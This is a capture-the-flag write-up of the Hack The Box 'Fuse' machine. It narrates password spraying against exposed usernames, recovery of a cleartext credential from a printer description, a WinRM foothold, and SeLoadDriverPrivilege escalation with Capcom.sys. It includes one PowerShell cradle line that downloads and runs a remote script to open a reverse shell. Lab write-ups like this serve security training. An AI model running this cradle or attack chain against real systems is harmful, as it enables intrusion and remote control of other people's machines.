My observations while working this target:
· Enumeration: Life-like
· Vulnerabilities: Life-like
· Exploitation: Life-like
· Foothold Difficulty: Medium
· Privilege Escalation Difficulty: Easy/Medium
The recommended tools for this lab were:
· Web Browser
· Visual Studio 19 (on Windows)
· HTTP Server
· Exposed Username(s)
· Weak Password
· Cleartext Password
· Privilege Abuse
Using Nmap, I saved the output while scanning for service version detection, OS detection, script scanning, and verbose mode of the target system.
Since the target was identified as a Windows system, and most likely a domain controller, I decided to use CrackMapExec to further enumerate SMB and LDAP.
For a sanity check, I decided to use Impacket tools to validate the findings from CrackMapExec.
Having no luck with enumerating SMB nor LDAP, I decided to launch a browser and investigate. However, using only the IP Address yielded no results. So, I added a hostname and the domain name into my Attacker system /etc/hosts file.
I then returned to the browser and used the FQDN and successfully established a connection to the Web Server. As I continued to investigate the web page, I clicked on one of the View hyperlinks; which opened another page that contained usernames within the printer logs.
I reviewed all three View hyperlinks to gather additional exposed usernames.
After gathering the usernames, I decided that I would try to password spray the target; even though I was not able to obtain the password lockout policy.
As to the password list, I decided to use the common weak passwords of seasons, months, password, machine name, and domain name. I then created a for loop that added 2020, as well as an !, to create an additional password set.
Next, I used HashCat to mangle the list with two rules; while removing passwords that were less than 8 characters in length.
After about 20+ minutes, CrackMapExec returned the following match.
Note: I probably should have started out with a smaller password list to conserve time.
Next, I used the found credentials to see if I could gain any more insight using CrackMapExec.
Knowing that I identified that the account required a credential change, I used SMBPasswd to change the credentials for the tlavel account. Once changed, I then executed RPCClient with the new credentials.
The above combination of SMBPasswd and RPCClient were successful when I was creating this writeup. However, when I was working the target, I kept encountering a login failure after changing the password. And yes, I used a different password combination each time I successfully changed the password.
Originally, this part felt a little CTF’ish to me. But, I understood that the Fuse author had to make sure that others working on the HTB Free version were not impacted by password changes based on the original password spraying results.
That said, I decided to create a script (script.sh) to automate the SMBPasswd and RPCClient process. The script would be quicker than I could type and would provide me basic enumeration of the target. In addition to the script.sh, I created an auth.in file to automate the RPCClient login process, as well as executing commands for basic enumeration.
Reviewing the screen output of the RPCClient results, I noticed a cleartext password within the HP-MFT01 printer description.
After obtaining the cleartext password and additional users from the RPCClient enumeration, I modified my userlist.txt and then launched a password spraying attack with CrackMapExec.
Once I obtained the new credentials, I once again used CrackMapExec to test access for a WinRM session.
Next, I launched EvilWinRM with the obtained credentials and was able to successfully establish a foothold.
After establishing a foothold, I started to enumerate the target. Interestingly, I have not seen the SeLoadDriverPrivilege enabled for a service account. So, I performed an Internet based search for “SeLoadDriverPrivilege abuse” and found a few articles that provided details for a privilege escalation.
Completing my review of the documents, I downloaded the two GitHub repositories and the linked Capcom.sys file. Next, I launched Visual Studio on my Windows 10 system and created a new CMD project for EoPLoadDriver.cpp.
After reviewing the code and making no changes, I decided to build the project. However, I had an issue during the compiling process. After doing a little research, Visual Studio seems to append the following line of code: #include “stafx.h“ for a precompiled header. Since the code was not that large, and not caring about compiling speed, I removed that line and recompiled without issue.
Next, I opened the ExploitCapcom project and reviewed the code. Based on the documentation, as well as the code, this exploit is normally launched when one has an RDP or GUI session. Since I only had a shell, I would not be able to launch a second shell within WinRM. So, I modified the code to call a BAT file verses executing CMD.exe.
Once the modification was made, I rebuilt the project as a release.
With both of the C++ projects compiled as Windows binaries, I copied them to my Attacker system in the same directory where I previously copied Capcom.sys. I then created the referenced exploit.bat file (see ExploitCapcom.cpp) with a PowerShell Cradle.
powershell.exe iex (iwr http://10.10.15.111/Invoke-RS.ps1 -UseBasicParsing);
Using WinRM’s builtin upload function, I uploaded all four files to the current working directory. Once the files were uploaded, I used the EoPLoadDriver instructions from the GitHub page to execute the SeLoadDriverPrivilege abuse with the Capcom.sys file.
Next, I launched both NetCat and a Python HTTP Server on my attacker system. Once established, I then executed the ExploitCapcom.exe binary on the target system.
Within seconds, the exploit called the BAT file; which executed the PowerShell Cradle and established a reverse shell to my Attacker system.
This article is made available for educational purposes only!!! In addition, this article provides general information on cyber security topics used for “Ethical Hacking”.
Persons accessing this information assume full responsibility for the use and agree to not use this content for any illegal purpose. Furthermore, the author is not liable for any direct or indirect damages or expense incurred which may result from the use of the information covered within this article.
Information within this article is “as is”, without warranty of any sort.